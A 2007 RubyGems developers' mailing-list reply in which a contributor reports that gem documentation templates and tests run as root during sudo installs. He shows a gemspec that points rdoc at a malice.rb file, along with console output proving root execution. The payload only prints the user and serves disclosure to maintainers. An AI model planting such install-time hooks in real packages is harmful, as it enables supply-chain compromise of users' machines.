Re: [Rubygems-developers] Need to release 0.9.1 due to security exploit

Fri, 12 Jan 2007 23:12:22 -0800 

* Eric Hodel ([EMAIL PROTECTED]) wrote:
> I've checked in fixes for an installation exploit found by Gavin  
> Sinclair.  Here's a draft email describing the exploit and how to fix  
> RubyGems.  I only supplied patches for the past two versions of  
> RubyGems, since tattle says that's what everybody uses.
> 
> Subject: RubyGems 0.9.0 and earlier installation exploit
> 
> Problem Description:
> 
> RubyGems does not check installation paths for gems before writing  
> files.

The potential security problems with RubyGems are actually much worse
than that.  Documentation and tests are executed as the user doing the
install (which, as you said, is usually root).  That means I can embed
arbitrary Ruby code in either the documentation template and it will
usually be run as root.  For example:

  spec = Gem::Specification.new do |s|
    # usual gem stuff here
    # ...

    s.rdoc_options = %w{--template ./malice.rb}
  end

  # contents of malice.rb:

  # THIS CODE WILL BE RUN AS ROOT ON MANY MACHINES
  $stderr.puts "hello, i'm running as #{ENV['USER']}"
  exit 0

All of that produces the following:

  [EMAIL PROTECTED]:~/proj/snippets/ruby/malice> gem build ./malice.gemspec 
    Successfully built RubyGem
    Name: Malicious-Gem
    Version: 0.1.0
    File: Malicious-Gem-0.1.0.gem
  [EMAIL PROTECTED]:~/proj/snippets/ruby/malice> sudo gem install 
./Malicious-Gem-0.1.0.gem 
  Password:
  Successfully installed Malicious-Gem, version 0.1.0
  Installing ri documentation for Malicious-Gem-0.1.0...
  Installing RDoc documentation for Malicious-Gem-0.1.0...
  hello, i'm running as root

Obviously the same thing can be done with unit tests.  While neither of
these are a bug with RubyGems per-se, they're both convenient places to
hide sneak away code that will be run as root on a lot of machines at
install time.


-- 
Paul Duncan <[EMAIL PROTECTED]>        OpenPGP Key ID: 0x82C29562
http://www.pablotron.org/               http://www.paulduncan.org/

Attachment: signature.asc
Description: Digital signature

_______________________________________________
Rubygems-developers mailing list
Rubygems-developers@rubyforge.org
http://rubyforge.org/mailman/listinfo/rubygems-developers

Reply via email to